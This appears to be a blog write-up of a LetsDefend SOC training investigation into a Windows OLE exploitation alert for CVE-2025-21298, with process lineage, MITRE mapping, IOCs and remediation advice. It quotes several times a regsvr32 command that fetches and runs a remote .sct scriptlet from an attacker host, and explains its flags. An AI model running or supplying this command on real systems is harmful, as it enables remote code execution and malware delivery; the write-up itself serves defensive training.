June 6, 2026
SOC336 — Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025–21298) — LetsDefend
Zero-click vulnerabilities are among the most dangerous classes of attacks because they require little to no user interaction to achieve…
Rizwann
4 min read
Zero-click vulnerabilities are among the most dangerous classes of attacks because they require little to no user interaction to achieve code execution
Event ID: 336 & Rule Name: SOC336 — Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025–21298)
In this investigation, I analyzed SOC336 — Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025–21298) within the LetsDefend platform. I traced how a malicious email attachment led to suspicious command execution and remote payload retrieval activity on the endpoint.
The case demonstrates how attackers exploit trusted Windows components, phishing delivery mechanisms, and native system utilities to establish execution while blending into legitimate operating system behavior.
Alert Overview
Field Value
Alert Name Windows OLE Zero-Click RCE Exploitation Detected
Event ID 336
Severity Critical
CVE CVE-2025-21298
Alert Type Malware / Exploitation
Detection Rule SOC336
Recipient Austin@letsdefend.io
Sender projectmanagement@pm.me
Verdict True PositiveField Value
Alert Name Windows OLE Zero-Click RCE Exploitation Detected
Event ID 336
Severity Critical
CVE CVE-2025-21298
Alert Type Malware / Exploitation
Detection Rule SOC336
Recipient Austin@letsdefend.io
Sender projectmanagement@pm.me
Verdict True PositiveUnderstanding CVE-2025–21298
CVE-2025–21298 is a critical Windows OLE remote code execution vulnerability affecting the ole32.dll component responsible for Object Linking and Embedding (OLE) operations in Microsoft Windows.
The vulnerability can be triggered through specially crafted files containing malicious embedded OLE objects, commonly delivered through:
- RTF documents,
- phishing attachments,
- malicious embedded content.
What makes this vulnerability particularly dangerous is its potential for zero-click exploitation, meaning code execution may occur when the file is previewed or processed without requiring extensive user interaction.
Successful exploitation may allow attackers to:
- execute arbitrary code,
- download additional malware,
- establish persistence,
- exfiltrate sensitive information,
- gain remote access to the endpoint.
Initial Investigation
The investigation began with a review of the suspicious email delivered to the victim endpoint.
Observed Email Activity
The email:
- originated from an external sender,
- contained a suspicious attachment,
- triggered security detections,
- aligned with known phishing delivery behavior.
The sender IP was queried through threat intelligence feeds and was flagged as malicious based on previously observed suspicious activity.
This immediately elevated the alert severity and supported the likelihood of active exploitation attempts.
Attachment Analysis
The email attachment was identified as potentially malicious and associated with the CVE exploitation attempt.
The attachment likely leveraged:
- malicious embedded OLE objects,
- crafted RTF behavior,
- exploitation of vulnerable OLE parsing mechanisms.
This type of attack commonly abuses Office document rendering behavior to initiate execution chains on the endpoint.
Log 1.1 — Process Execution Analysis
The most critical evidence appeared within endpoint process execution logs.
Suspicious Command Observed
C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dllC:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dllThis command strongly indicates malicious activity and abuse of trusted Windows utilities.
Breaking Down the Command
Parent Process Chain
OUTLOOK.EXE
↓
cmd.exe
↓
regsvr32.exeOUTLOOK.EXE
↓
cmd.exe
↓
regsvr32.exeThis process lineage is highly suspicious because normal email activity should not result in command-line execution followed by the retrieval of a remote script.
Why was regsvr32.exe suspicious
regsvr32.exe — legitimate Windows utility typically used to register or unregister a DLL.
However, attackers frequently abuse it as a Living-off-the-Land Binary (LOLBIN) because:
- Windows trusts it,
- often whitelisted,
- capable of executing remote scripts,
- useful for bypassing security controls.
Suspicious Parameters Identified
Parameter Purpose
/s Silent execution
/u Unregister DLL
/i: Pass the remote script location
scrobj.dll Script execution via COM scriptingParameter Purpose
/s Silent execution
/u Unregister DLL
/i: Pass the remote script location
scrobj.dll Script execution via COM scriptingThe following remote resource was contacted:
http://84.38.130.118.com/shell.scthttp://84.38.130.118.com/shell.sctThis indicates:
- outbound network communication,
- remote payload retrieval,
- script-based execution activity.
Why This Matters
This behavior aligns closely with:
- fileless malware execution,
- scriptlet abuse,
- LOLBIN exploitation,
- defense evasion techniques.
The .sct file extension represents a Windows Script Component commonly abused in malware campaigns.
Rather than dropping traditional executable malware to disk, attackers leverage trusted Windows utilities to execute scripts directly in memory, reducing detection opportunities.
Network Activity Analysis
Log management data confirmed that the endpoint outbound traffic to the malicious remote host was permitted.
This indicates:
- The remote script retrieval succeeded,
- the endpoint established communication with attacker-controlled infrastructure, and
- follow-on execution activity may have occurred.
The successful outbound request significantly increases the confidence level of compromise.
Threat Assessment
This incident should be classified as a True Positive for an exploitation and malware execution event.
The investigation identified:
- phishing delivery,
- malicious attachment activity,
- exploitation behavior,
- suspicious process lineage,
- LOLBIN abuse,
- remote script retrieval,
- outbound C2 communication attempts.
The observed activity strongly suggests active exploitation rather than benign behavior.
MITRE ATT&CK Mapping
Tactic Technique ID
Initial Access Phishing Attachment T1566.001
Execution Command and Scripting Interpreter: CMD T1059.003
Execution c Visual Basic / Script Execution T1059
Defense Evasion Signed Binary Proxy Execution: Regsvr32 T1218.010
Command and Control Application Layer Protocol T1071.001
Persistence Script-Based Execution T1059
Exploitation Exploit Public-Facing/Client Application T1203Tactic Technique ID
Initial Access Phishing Attachment T1566.001
Execution Command and Scripting Interpreter: CMD T1059.003
Execution c Visual Basic / Script Execution T1059
Defense Evasion Signed Binary Proxy Execution: Regsvr32 T1218.010
Command and Control Application Layer Protocol T1071.001
Persistence Script-Based Execution T1059
Exploitation Exploit Public-Facing/Client Application T1203Mapping activity to ATT&CK techniques helps standardize incident analysis and improve threat detection engineering.
Indicators of Compromise (IOCs)
IOC Type Value
Malicious URL http://84.38.130.118.com/shell.sct
LOLBIN Utility regsvr32.exe
Suspicious DLL scrobj.dll
Parent Process OUTLOOK.EXE
Child Process cmd.exe
Network Activity Remote script retrieval
Vulnerability CVE-2025-21298IOC Type Value
Malicious URL http://84.38.130.118.com/shell.sct
LOLBIN Utility regsvr32.exe
Suspicious DLL scrobj.dll
Parent Process OUTLOOK.EXE
Child Process cmd.exe
Network Activity Remote script retrieval
Vulnerability CVE-2025-21298These indicators can support:
- enterprise threat hunting,
- SIEM detection tuning,
- IOC blocking,
- endpoint monitoring improvements.
Containment and Remediation
Immediate Response Actions
- Isolate the affected endpoint
- Block malicious IP/domain communication
- Terminate suspicious regsvr32 activity
- Remove downloaded payloads or persistence artifacts
- Review additional endpoint activity
- Reset potentially exposed credentials
Long-Term Security Improvements
- Patch vulnerable Windows systems
- Disable unnecessary OLE object handling where feasible
- Monitor regsvr32 abuse activity
- Restrict outbound script retrieval
- Enhance EDR process lineage monitoring
- Improve phishing attachment controls
- Strengthen PowerShell and LOLBIN detections
Lessons Learned
This investigation reinforced several important defensive security lessons.
1. Trusted Windows Utilities Can Be Weaponized
Attackers frequently abuse native binaries such as:
- regsvr32.exe,
- PowerShell,
- cmd.exe
to evade traditional security controls.
2. Process Lineage Provides Critical Context
The chain:
OUTLOOK.EXE → cmd.exe → regsvr32.exeOUTLOOK.EXE → cmd.exe → regsvr32.exeimmediately exposed abnormal execution behavior.
3. Zero-Click and Low-Interaction Attacks Are High Risk
Even limited interaction with malicious documents can trigger execution chains that download and execute remote payloads.
4. Network Telemetry Strengthens Investigations
Outbound requests to the attacker infrastructure provided strong evidence of exploitation.
Final Verdict
Based on the endpoint telemetry, process lineage, and network activity, this investigation confirms a True Positive exploitation attempt involving CVE-2025–21298.
The attack leveraged:
- phishing delivery,
- malicious OLE content,
- regsvr32 LOLBIN abuse,
- remote script execution,
- outbound payload retrieval.
This case highlights the continued effectiveness of phishing-based exploitation combined with trusted Windows binaries. It emphasizes the importance of behavioral monitoring, process analysis, and proactive endpoint detection within modern SOC operations.
REFERENCE LINK